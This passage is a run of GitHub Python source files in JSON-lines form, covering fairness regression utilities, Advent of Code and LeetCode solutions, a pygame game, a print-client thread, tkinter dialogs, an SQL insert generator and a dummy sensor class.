trainY_n_sub = trainY_n[sample_ids]\r\n for i in range(n_sub):\r\n for j in range(n_sub):\r\n Ks[i,j], Kx[i,j] = ks(trainS_n_sub[i],trainS_n_sub[j]), kx(trainX_rn_sub[i],trainX_rn_sub[j])\r\n sol = self.Fair_Prediction_Kernel_Optimization(eps, lmd, Ks, Kx, trainS_n_sub, trainX_rn_sub, trainY_n_sub)\r\n\r\n trainYhat = np.matmul(Ks, sol[:n_sub]) + np.matmul(Kx, sol[n_sub:])\r\n valid_n = len(validS)\r\n Ks_valid, Kx_valid = np.zeros((valid_n, n_sub)), np.zeros((valid_n, n_sub))\r\n for i in range(valid_n):\r\n for j in range(n_sub):\r\n 
Ks_valid[i,j], Kx_valid[i,j]\\\r\n = ks(validS_n[i],trainS_n_sub[j]), kx(validX_rn[i],trainX_rn_sub[j])\r\n validYhat = np.matmul(Ks_valid, sol[:n_sub]) + np.matmul(Kx_valid, sol[n_sub:])\r\n test_n = len(testS)\r\n Ks_test, Kx_test = np.zeros((test_n, n_sub)), np.zeros((test_n, n_sub))\r\n for i in range(test_n):\r\n for j in range(n_sub):\r\n Ks_test[i,j], Kx_test[i,j]\\\r\n = ks(testS_n[i],trainS_n_sub[j]), kx(testX_rn[i],trainX_rn_sub[j])\r\n testYhat = np.matmul(Ks_test, sol[:n_sub]) + np.matmul(Kx_test, sol[n_sub:])\r\n\r\n result_train = Result(self.trainY[sample_ids], trainYhat + np.mean(self.trainY[sample_ids]), self.trainS[sample_ids], avails) \r\n result_valid = Result(validY, validYhat + np.mean(self.trainY), validS, avails) \r\n result_test = Result(testY, testYhat + np.mean(self.trainY), testS, avails) \r\n\r\n return result_train, result_valid, result_test\r\n\r\n\r\n\r\n","repo_name":"jkomiyama/fairregresion","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":24675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"28385142743","text":"from collections import defaultdict\n\nclass Polymerization:\n def __init__(self):\n\n self.pairs = {}\n self.polymer_template = []\n self.current_pairs = defaultdict(int)\n self.char_freq = defaultdict(int) \n\n \n def add_pair(self, point: list) -> None:\n self.pairs[point[0]] = point[1]\n\n def initial_pairs(self):\n for c in range(0, len(self.polymer_template) - 1):\n pair = self.polymer_template[c] + self.polymer_template[c + 1]\n self.current_pairs[pair] += 1\n\n def make_new_pairs(self):\n new_pairs = defaultdict(int)\n for pair in self.current_pairs:\n new_polymer = self.pairs[pair]\n \n new_pair_1 = pair[0] + new_polymer\n new_pair_2 = new_polymer + pair[1]\n \n new_pairs[new_pair_1] += self.current_pairs[pair]\n new_pairs[new_pair_2] += self.current_pairs[pair]\n \n self.char_freq[new_polymer] += self.current_pairs[pair]\n self.current_pairs = new_pairs\n\n\n def freq(self):\n for c in self.polymer_template:\n self.char_freq[c] += 1\n\nif __name__ == \"__main__\":\n p = Polymerization()\n steps = 40\n max_freq = 0\n min_freq = 0\n\n # Read points.\n with open('2021\\Day14_input.txt') as f:\n data = [x.rstrip() for x in f.readlines()]\n for line in data:\n if line != '' and '->' not in line:\n for c in line:\n p.polymer_template.append(c)\n elif line != '':\n line = line.split(' -> ')\n p.add_pair(line)\n\n p.freq()\n p.initial_pairs()\n for c in range(steps):\n p.make_new_pairs()\n print(p.current_pairs)\n\n max_freq = max(p.char_freq.values())\n min_freq = min(p.char_freq.values())\n print(f'The max frequency is: {max_freq}')\n print(f'The min frequency is: {min_freq}')\n print(f'Most common - Least common: {max_freq - min_freq}')\n \n\n \n \n","repo_name":"Drdagost/Advent_of_Code","sub_path":"2021/Day14_2.py","file_name":"Day14_2.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8938516828","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler, RobustScaler\nimport matplotlib.pyplot as plt\n\n# 一、加载数据\ndata = np.loadtxt('ex1data1.txt', delimiter=',', dtype='float64')\nX = data[:, :-1] # data[:,0:1]\ny = data[:, -1:] # data[:,1:2]\nprint(X.shape)\n\nplt.scatter(X, y)\n# plt.show()\n\nscaler = StandardScaler()\nscaler.fit(X)\n# print(scaler.mean_) 均值\n# 
print(scaler.scale_) 标准偏差\nX = scaler.transform(X)\n# print(X)\n\nr_scaler=RobustScaler()\nr_scaler.fit(X)\nX=r_scaler.transform(X)\n# print(X[:,0])\n# print(X[:,1])\n\ndef plot_after_feature_normalization(X):\n plt.scatter(X,y,color='r')\n plt.show()\n\nplot_after_feature_normalization(X)\n\nmodel = LinearRegression()\nmodel.fit(X, y)\n\nX_test = np.array([[1650]], dtype='float64')\nresult = model.predict(X_test)\nprint(model.coef_) # Coefficient of the features 决策函数中的特征系数\nprint(model.intercept_) # 又名bias偏置,若设置为False,则为0\nprint(result[0][0])\n","repo_name":"Christings/myMachineLearningNote","sub_path":"linear/linear_sklearn.py","file_name":"linear_sklearn.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9734401659","text":"import pygame\n\nfrom .components.player import Player\nfrom .components.bullet import Bullet\n\n\nSCREEN_WIDTH = 500\nSCREEN_HEIGHT = 500\n\nwin = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Dual\")\n\n\ndef main():\n run = True\n clock = pygame.time.Clock()\n starting_health = 250\n p = Player(win, 0, 0, (starting_health, 0, 0), starting_health)\n p2 = Player(win, 450, 450, (0, starting_health, 0), starting_health)\n bullet = Bullet(win)\n\n while run:\n clock.tick(60)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n p.move()\n p2.move()\n\n win.fill((0, 0, 0))\n p.draw()\n p2.draw()\n\n if bullet.is_ready():\n bullet.set_movement(\n p2.x + 22.5,\n p2.y,\n p2.velx,\n 6\n )\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_SPACE] and bullet.is_ready():\n bullet.ready = False\n bullet.draw()\n\n if not bullet.is_ready():\n bullet.draw()\n bullet.move()\n if bullet.y + 5 >= p.y and bullet.y < p.y + 50:\n if bullet.x + 5 >= p.x and bullet.x < p.x + 50:\n p.health -= 50\n p.colors = (p.health, 0, 0)\n bullet.ready = True\n\n pygame.display.update()\n\n if p.health <= 0:\n pygame.quit()\n\n\nmain()\n","repo_name":"DaleNaci/Dual","sub_path":"data/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32147070178","text":"import time\nimport threading\nimport bin.my_lib.receiver3 as receiver\nimport bin.settings as settings\nWHERE = \"bin.units\"\n\n'''\ndef print_local_files():\n while True:\n printer.print_local_task(\"c:\\\\printer\\\\local_task\\\\\")\n time.sleep(2) # 2秒扫描一次文件夹\n\n\ndef print_received_files():\n while True:\n try:\n user_list = os.listdir(WORK_PATH) # 持续地获取传输文件夹的文件列表\n print(\"main:当前收到的文件有:\\n\", user_list)\n for user in user_list:\n registered_user = re.match('^1[0-9]{10}$', user) # 判断文件夹是否符合命名规则\n task_list = os.listdir(os.path.join(WORK_PATH, user))\n for task in task_list:\n print(\"main:正在扫描received_files\")\n file_list = os.listdir(os.path.join(WORK_PATH, user, task))\n if registered_user and ('info.json' in file_list):\n task_abspath = os.path.join(WORK_PATH, user, task)\n info = json_read_write.read(os.path.join(task_abspath, \"info.json\")) # 获取info信息\n status = info['user']['status']\n print(\"-------------------------\")\n if status == 'received': # 判断文件是否传输完毕\n print(\"main:received\")\n print(\"main:\" + task + \"的所有文件已经传输完毕,开始打印\")\n # change_json(\"C:\\\\printer\", \"config.json\", config)\n print(task_abspath)\n printer.print_files(task_abspath + '\\\\')\n # 打印task目录下的文档,只需向printer函数提交一个绝对路径就可\n # 以打印该目录所有的文档\n message = 
'用户%s已经打印' % task\n win32api.MessageBox(0, message, '提示信息', 1)\n info['user']['status'] = 'printing' # 把处理状态修改为printing\n print('main:当前目录为:', os.getcwd())\n # change_json(task_abspath, 'info.json', info)\n json_read_write.write(os.path.join(task_abspath, \"info.json\"), info) # 写入info信息,修改status的状态\n elif status == 'receiving':\n print(\"main:用户:%s的文件尚未传输完毕,暂不打印\" % task)\n elif status == 'printed':\n print(\"main:用户:%s的文件打印完毕,无需处理\" % task)\n \"\"\"\n elif status == 'printing':\n if printer.task():\n print(\"main:用户:%s的文件正在打印,无需处理\" % task)\n else:\n print(\"main:用户:%s的文件打印完毕,移至printed文件夹\" % task)\n printed_info = get_json(os.path.join(WORK_PATH, user, task), \"info.json\")\n serial_number = printed_info[\"serial_number\"]\n os.mkdir(\"C:\\\\printer\\\\printed\\\\\" + serial_number) # 创建用任务号命名的文件夹\n shutil.move(os.path.join(WORK_PATH, user, task),\n \"c:\\\\printer\\\\printed\\\\%s\" % serial_number) \n \"\"\"\n except:\n print(\"main:打印收到文件出错\")\n time.sleep(10) # 两秒扫描一次文件目录\n'''\n\n\nclass ThreadReceiver(threading.Thread):\n # 下载模块\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.SWITCH = True\n\n def receiver(self):\n # 每10秒从服务器获取一次文件\n while self.SWITCH:\n print(WHERE, \"开始执行下载程序\")\n receiver.start()\n print(WHERE, \"下载程序执行完毕\")\n time.sleep(10)\n\n def run(self):\n print(WHERE, self.name, \"线程开始\")\n self.receiver()\n print(WHERE, self.name, \"线程已结束\")\n\n def stop(self):\n self.SWITCH = False\n\n\n'''\nclass ThreadPrintReceived (threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print (\"main:开始线程:\" + self.name)\n manager.print_received_files()\n\n\nclass ThreadPrintLocal (threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print (\"main:开始线程:\" + self.name)\n manager.print_local_files()\n'''\n\n# 线程1:接收服务器的文件\n# receiver1 = ThreadReceiver(1, \"receiver\")\n# receiver1.start()\n# 线程2:打印接收完毕的文件\n# print_thread1 = ThreadPrintReceived(1, \"print_receive_files\")\n# print_thread1.start()\n# 线程3:打印local_task的文件\n# local_print_thread1 = ThreadPrintLocal(1, \"print_local_files\")\n# local_print_thread1.start()","repo_name":"ziqiangxu/cloud-printing-client","sub_path":"bin/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"23774146591","text":"'''\nBest Time to Buy and Sell Stock with Cooldown\n\nSolution\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\n\nFind the maximum profit you can achieve. 
You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times) with the following restrictions:\n\nAfter you sell your stock, you cannot buy stock on the next day (i.e., cooldown one day).\nNote: You may not engage in multiple transactions simultaneously (i.e., you must sell the stock before you buy again).\n\n \n\nExample 1:\n\nInput: prices = [1,2,3,0,2]\nOutput: 3\nExplanation: transactions = [buy, sell, cooldown, buy, sell]\nExample 2:\n\nInput: prices = [1]\nOutput: 0\n \n\nConstraints:\n\n1 <= prices.length <= 5000\n0 <= prices[i] <= 1000\n'''\n#top down memo, accepted\n# class Solution:\n# def maxProfit(self, prices: [int]) -> int:\n# l = len(prices)\n# dp = [[0]*2 for _ in range(l)]\n# def helper(i, buy):\n# if i >= l: return 0\n# if dp[i][buy] > 0: return dp[i][buy]\n# if buy:\n# dp[i][buy] = max(-prices[i]+helper(i+1, 0), helper(i+1, 1))\n# else:\n# dp[i][buy] = max(prices[i]+helper(i+2, 1), helper(i+1, 0))\n# return dp[i][buy]\n\n# return helper(0, 1)\n\n#bottom up dp\nclass Solution:\n def maxProfit(self, prices: [int]) -> int:\n l = len(prices)\n dp = [[0]*2 for _ in range(l+2)]\n for i in range(l-1, -1, -1):\n for buy in range(2):\n if buy:\n dp[i][buy] = max(-prices[i]+dp[i+1][0], dp[i+1][1])\n else:\n dp[i][buy] = max(prices[i]+dp[i+2][1], dp[i+1][0])\n return dp[0][1]\n\nprices = [1,2,3,0,2]\n# Output: 3\n\n# prices = [1]\n# Output: 0\n\nsol = Solution()\nprint(sol.maxProfit(prices))\n","repo_name":"jomesh18/Leetcode","sub_path":"DP/maxProfit2.py","file_name":"maxProfit2.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"46052067540","text":"import json\nimport os.path\n\nfrom flask import Flask, render_template, request\nfrom multiprocessing import Value\n\nimport utils.paths as paths\nfrom annotator.annotate import reverse_label\nfrom utils.annotation_keys import TESTIMONY\nfrom utils.file_utils import read_tweet_from_path_and_index\n\ncounter = Value('i', 0)\napp = Flask(__name__)\nstored_data = []\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n done_ids = extract_done_ids_from_output_file(paths.OUTPUT_DATA_FILE)\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, counter.value)\n\n # Listen for user input on saving data\n if request.method == \"POST\":\n if request.form['submit_button'] == 'save':\n write_entries_to_file(paths.OUTPUT_DATA_FILE, stored_data)\n stored_data.clear()\n\n # read through file to find tweet not already done\n while tweet and tweet.get('id') in done_ids:\n counter.value += 1\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, counter.value)\n\n # variable for the progress bar\n len_progress_bar = calculate_progress_bar(paths.INPUT_DATA_FILE)\n\n # end of file reached\n if not tweet:\n return render_template(\n 'end.html',\n end_of_file_message=\"Good job !\"\n )\n\n # all info about the tweet\n label = TESTIMONY\n tweet_id = tweet.get('id')\n tweet_text = tweet.get('text')\n tweet_english_text = tweet.get('en_text')\n\n # user input in one of the three action buttons\n if request.method == \"POST\":\n if request.form['submit_button'] in ['accept', 'reject', 'pass']:\n if request.form['submit_button'] == 'accept':\n tweet.update({'label': label})\n elif request.form['submit_button'] == 'reject':\n tweet.update({'label': reverse_label(label)})\n elif request.form['submit_button'] == 'pass':\n tweet.update({'flag': 'problematic'})\n 
stored_data.append(tweet)\n with counter.get_lock():\n counter.value += 1\n out = counter.value\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, out)\n if not tweet:\n return render_template(\n 'end.html',\n end_of_file_message=\"Good job !\"\n )\n return render_template(\n 'base.html',\n tweet_id=tweet.get('id'),\n tweet_text=tweet.get('text'),\n tweet_english_text=tweet.get('en_text'),\n tweet_french_text=tweet.get('fr_text'),\n label=label,\n index_progress=out,\n progress_bar=len_progress_bar\n )\n\n elif request.form['submit_button'] == \"revert\":\n if counter.value != 0:\n if stored_data:\n stored_data.pop(-1)\n with counter.get_lock():\n counter.value -= 1\n out = counter.value\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, out)\n return render_template(\n 'base.html',\n tweet_id=tweet.get('id'),\n tweet_text=tweet.get('text'),\n tweet_english_text=tweet.get('en_text'),\n tweet_french_text=tweet.get('fr_text'),\n label=label,\n index_progress=out,\n progress_bar=len_progress_bar\n )\n\n return render_template(\n 'base.html',\n tweet_id=tweet_id,\n tweet_text=tweet_text,\n tweet_english_text=tweet_english_text,\n tweet_french_text=tweet.get('fr_text'),\n label=label,\n index_progress=counter.value,\n progress_bar=len_progress_bar\n )\n\n\ndef calculate_progress_bar(file_path):\n with open(file_path, 'r') as input_file:\n return len(input_file.readlines())\n\n\ndef write_entries_to_file(file_path, buffer):\n with open(file_path, 'a') as output_file:\n for tweet in buffer:\n output_file.write(json.dumps(tweet) + \"\\n\")\n\n\ndef extract_done_ids_from_output_file(file_path):\n done_ids = []\n with open(file_path, 'a+') as output_file:\n output_file.seek(0)\n for line in output_file.readlines():\n done_ids.append(json.loads(line).get('id'))\n return done_ids\n","repo_name":"RandomJungle/meTooAnnotation","sub_path":"interface/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24725736776","text":"#goal: given a simple string type math function (like '((1+2)/(3+4))'), calculate it.\n\n#code:\nimport operator \ndef string_math(str):\n operands = []\n operators = []\n ops = {'+':operator.add, '-':operator.sub, '*':operator.mul, '/':operator.truediv}\n for term in str:\n if term == '(': #it means start a calculation\n continue\n elif term == ')':\n right, left = operands.pop(), operands.pop()\n operands.append(ops[operators.pop()](left,right))\n elif term in ops:\n operators.append(term)\n else:\n operands.append(int(term))\n return operands[0]\n \n","repo_name":"WideSu/Python","sub_path":"02. DataStructure/03. queue_stack/07. string_math.py","file_name":"07. 
string_math.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28778520280","text":"import tkinter.filedialog\nfrom typing import Optional\n\n\ndef open_file_dialog(\n        filetypes: list[tuple[str, str]],\n        title: Optional[str] = \"Select A File\",\n        initialdir: Optional[str] = \"/\") -> str:\n    \"\"\"\n    Opens a file dialog and returns the selected file (restricted to the given filetypes).\n    :param title: title of the file dialog\n    :param filetypes: list of selectable file types\n    :param initialdir: initial file dialog directory\n    :return: selected file\n    \"\"\"\n    return tkinter.filedialog.askopenfilename(\n        initialdir=initialdir, title=title, filetypes=filetypes\n    )\n\n\ndef get_path_dialog(\n        filetypes: list[tuple[str, str]],\n        initialfile: str = \"\",\n        title: Optional[str] = \"Select A Path\",\n        initialdir: Optional[str] = \"/\") -> str:\n    \"\"\"\n    Opens a file dialog and returns the selected path and the selected filename (restricted to the given filetypes).\n    :param filetypes: list of selectable file types\n    :param initialfile: initial file name\n    :param title: title of the file dialog\n    :param initialdir: initial file dialog directory\n    :return: selected path and file name\n    \"\"\"\n    return tkinter.filedialog.asksaveasfilename(\n        title=title,\n        filetypes=filetypes,\n        initialdir=initialdir,\n        initialfile=initialfile\n    )\n","repo_name":"Mova801/nextqr","sub_path":"new/libs/filedialog_manager.py","file_name":"filedialog_manager.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"688063557","text":"#!/usr/bin/env python2.7\nimport sys, argparse, pybedtools, scipy.stats\nfrom collections import defaultdict\nimport numpy as np\n\nparser = argparse.ArgumentParser(description=\"\"\"\n\n    Given gc.bedGraph (chr, start, end, pct_gc)\n    Generate a corresponding gc_fe_table.txt: chr, start, end, gc, treatcov, controlcov, fe\n\n    Typical procedure beforehand:\n\n    bedtools makewindows -g hg19.genome -w 100 -s 100 | bedtools intersect -v -a - -b excludedregions.bed | awk '$3-$2 == 100 {OFS=\"\\t\"; print $1,$2,$3}' | bedtools nuc -fi hg19.fa -bed - | awk '!/^#/ {OFS=\"\\t\"; print $1,$2,$3,$5}' > gc.bedGraph\n\n    Output header: chr, start, end, pct_gc, test_value, control_value, test/control value (FE), label, [CNV if used]\n\n    \n    \"\"\", formatter_class= argparse.RawTextHelpFormatter)\nparser.add_argument('--table', '-i', '-f',\n                   type= str,\n                   help='''Path to gc.bedGraph.''')\nparser.add_argument('--gccol', \n                   type=int, default=4,\n                   help='''Assuming gc.bedGraph, default is 4. Change if necessary.''')\nparser.add_argument('--mincov', \n                   type=float, default=2**-8,\n                   help='''Min cov in bin for both treat and control. Default=2**-8.''')\n\nparser.add_argument('--addorisignal', '-a', \n                    type=str, default=False,\n                    help='''Add origin signal to bins. Begin on avg every Nth bin and extend for M bins on avg. Provide comma-separated N,M -- suggestion for 100 bp bins = 300,10''')\n\nparser.add_argument('--orisignalparams', '-p', \n                    type=str, default='20,3',\n                    help='''If adding origin signal to bins, this controls mean and stdev of additional signal. default = 20,3 ''')\n\n## TODO: use 'enrichment' instead of 'ori' -- as this can be thought of more generally than ORIs or NS-seq\n##parser.add_argument('--addenrichmentsignal', '-a', \n
##                    type=str, default=False,\n##                    help='''Add enrichment signal to bins. Begin on avg every Nth bin and extend for M bins on avg. Provide comma-separated N,M -- suggestion for 100 bp bins = 300,10''')\n##\n##parser.add_argument('--enrichmentsignalparams', '-p', \n##                    type=str, default='20,3',\n##                    help='''If adding enrichment signal to bins, this controls mean and stdev of additional signal. default = 20,3 ''')\n\n\nparser.add_argument('--addcnvsignal', '-c', \n                    type=str, default=False,\n                    help='''Add or subtract signal to/from bins corresponding to gains or losses in copy number.\nBegin on avg every Xth bin and extend for Y bins on avg. Provide comma-separated X,Y.\nSuggestion for 100 bp bins = 20000,1000 -- meaning you expect a 100 kb CNV every 2 Mb.\nNote - this adds CNV signal de novo to the signal being generated.\nHowever, it may be desired to add CNV signal in the same locations across multiple runs of this script.\nIf so, use --cnvlocations with path to desired already-simulated signal+CNV file that had CNVs put in the last column.\nUse --cnvcol to specify a different column if it is not column 9.\nBe conscious of avoiding using --addcnvsignal and --cnvlocations together -- i.e. don't do it unless intentionally adding CNVs on top of CNVs.\nNote though that it currently will not provide the correct CNV copy number in the last column if making CNVs on top of CNVs.\n\nUpdate: script has been altered such that if cnvlocations specified, then it will not also add more cnv signal...''')\n\nparser.add_argument('--cnvparams', '-P', \n                    type=str, default='2,8,0.5',\n                    help='''If adding CNV signal to bins, this controls the range of how large a gain or loss can be and the probability of gain (complement is prob of loss).\nProvide comma-sep list as min,max,prob. default = 2,8,0.5 meaning you expect gains/losses ranging from 2-8-fold and expect gains to be equally likely as losses.''')\n\nparser.add_argument('--cnvlocations', '-C', \n                    action='store_true', default=False,\n                    help='''This tells the script that, for the --table argument, instead of giving a normal gc.bedGraph,\nyou have provided path to a file previously generated by this script using --addcnvsignal.\nThis will use the same copy numbers reported in that file.\nIt assumes the gccol=4 and cnvcol=9. \n
Use --gccol and --cnvcol to alter.''')\n\nparser.add_argument('--cnvcol', \n type=int, default=9,\n help='''''')\n\n\nargs = parser.parse_args()\n\n\ngc2felist = defaultdict(list)\n\n\n\n################################################################ \n################ PROCESS ARGS IF NEED BED ######################\n################################################################\n''' Adjust column indexes to Python speak'''\ngccol=args.gccol-1\ncnvcol=args.cnvcol-1\n\n''' Take care of enrichment parameters if need be'''\nif args.addorisignal:\n N, M = (int(e) for e in args.addorisignal.strip().split(','))\n in_ori_prob = 1.0/N\n leave_ori_prob = 1.0/M\n in_origin = np.random.binomial(1, in_ori_prob)\n orimu, oristd = (float(e) for e in args.orisignalparams.strip().split(','))\n\n\n''' Take care of CNV parameters if need be'''\nif args.addcnvsignal:\n X, Y = (int(e) for e in args.addcnvsignal.strip().split(','))\n in_cnv_prob = 1.0/X\n leave_cnv_prob = 1.0/Y\n in_cnv = np.random.binomial(1, in_cnv_prob)\n cnv_min, cnv_max, cnv_is_gain_prob = (float(e) for e in args.cnvparams.strip().split(','))\n cnv_is_gain = np.random.binomial(1, cnv_is_gain_prob)\n cnv_magnitude = np.random.randint(cnv_min, cnv_max)\n if in_cnv:\n if cnv_is_gain:\n cnv_copy_num = 1.0 * cnv_magnitude\n else: #loss\n cnv_copy_num = 1.0 / cnv_magnitude\n else:\n cnv_copy_num = 1.0\n cnv_tag = str(cnv_copy_num)\n\n\n\n################################################################\n########################## EXECUTE #############################\n################################################################\n \nwith open(args.table) as table:\n for row in table:\n if args.cnvlocations:\n whole_row = row.strip().split() ## To avoid taking the treat, control, FE, label, CNV cols from older sim_gc file (just want chr, start, end, gc)\n row = whole_row[:3] + [whole_row[gccol]]\n gc = 100*float(row[3])\n old_cnv_copy_num = float(whole_row[cnvcol])\n else:\n row = row.strip().split()\n gc = 100*float(row[gccol])\n treat = max(args.mincov, np.random.normal(gc,(gc+1e-100)**0.5))\n control = max(args.mincov, np.random.normal(1,0.05))\n region = \"bg\"\n \n if args.addorisignal: ## add enrichment signal on top of background\n if in_origin:\n region = \"origin\"\n treat += np.random.normal(orimu,oristd)\n in_origin = 1 - np.random.binomial(1, leave_ori_prob)\n else:\n in_origin = np.random.binomial(1, in_ori_prob)\n \n if args.cnvlocations: ## CNV AFTER enrichment signal added\n treat *= old_cnv_copy_num\n cnv_tag = str(old_cnv_copy_num)\n \n elif args.addcnvsignal:\n if in_cnv:\n treat *= cnv_copy_num\n control *= cnv_copy_num\n in_cnv = 1 - np.random.binomial(1, leave_cnv_prob)\n else: #not in CNV\n cnv_copy_num = 1.0 ## Was not in CNV -- need this here before re-calculat in_cnv\n in_cnv = np.random.binomial(1, in_cnv_prob)\n if in_cnv: ## to avoid calculating the next lines too often, only re-calculate when back in CNV\n cnv_is_gain = np.random.binomial(1, cnv_is_gain_prob)\n cnv_magnitude = np.random.randint(cnv_min, cnv_max)\n if cnv_is_gain:\n cnv_copy_num = 1.0 * cnv_magnitude\n else: #loss\n cnv_copy_num = 1.0 / cnv_magnitude\n cnv_tag = str(cnv_copy_num)\n fe = treat/control\n row += [str(treat), str(control), str(fe), region]\n if args.cnvlocations or args.addcnvsignal:\n row += [cnv_tag]\n print 
(\"\\t\").join(row)\n","repo_name":"JohnUrban/sciara-project-tools","sub_path":"deprecated/pufferfish/pufferfish/TOGENERALIZE/sim_gc.py","file_name":"sim_gc.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5058947623","text":"import random\r\nimport numpy\r\nimport math\r\n#insert data στο SDOP\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/ADDRESSES.txt\", \"r\") as a2:\r\n for count, line in enumerate(a2):\r\n pass\r\nl1 = count+1\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/Cities.txt\", \"r\") as a1:\r\n for count, line in enumerate(a1):\r\n pass\r\nl2 = count + 1\r\na2 = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/ADDRESSES.txt\", \"r\")\r\na1 = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/Cities.txt\", \"r\")\r\nb = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/SDOP_INSERT.txt\", \"w\")\r\nstore = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/City_Addr.txt\", \"w\")\r\n\r\n\r\nSmall = min(l1, l2)\r\nBig = max(l1, l2)\r\npollaplotita = math.floor(Big / Small)\r\n\r\nb.write(\"#If you recreated this, remember to remove the last ',' in the file\" + \"\\n\" +\r\n \"INSERT INTO STATE_DEPOSIT_OF_PHARMACEUTICALS\"\r\n \"(CITY, SDOP_RANGE, SDOP_CAPACITY, ADDRESS, SDOP_DELIVERY_TIME)\"\r\n \"VALUES \" + \"\\n\")\r\n\r\n\r\nA = [[0 for col in range(2)] for row in range(Big)]\r\ncounter = 0\r\nfor i in range(0, Small):\r\n d_col1 = a1.readline().replace('\\n', '')\r\n for j in range(0, pollaplotita):\r\n counter = counter +1\r\n d_col2 = a2.readline().replace('\\n', '')\r\n Range = random.randint(0, 80)\r\n cap = random.randint(100, 100000)\r\n del_time = random.randint(1, 14)\r\n str_number = random.randint(1, 150)\r\n addr = d_col2 + str(str_number)\r\n A[counter] = [d_col1, addr]\r\n b.write(\"( '\" + d_col1 + \"', '\" + str(Range) + \"', '\" + str(cap) + \"', '\" + addr + \"', '\" + str(del_time) + \"' ),\" +\"\\n\")\r\nb.write(';' + \"\\n\")\r\nfor i in range (0,Big):\r\n store.write(str(A[i]) + \"\\n\")\r\n\r\na1.close()\r\na2.close()\r\nb.close()\r\nstore.close()\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/City_Addr.txt\", 'r') as fin:\r\n data = fin.read().splitlines(True)\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/City_Addr.txt\", 'w') as fout:\r\n fout.writelines(data[1:])\r\n","repo_name":"PavlosTzitzos/database-project","sub_path":"sql/creation and data insertion/STATE_DEPOSIT_OF_PHARMACEUTICALS.py","file_name":"STATE_DEPOSIT_OF_PHARMACEUTICALS.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15975793461","text":"from Phidget22.PhidgetException import *\nfrom Phidget22.Phidget import *\nfrom PhidgetDataLogger import Sensor\nimport numpy as np\nfrom time import sleep\nimport time\nimport queue\n\nclass DummySensor(Sensor):\n ''' Class derived from Sensor to simulte a phidget sensor by outputting\n sin waves. 
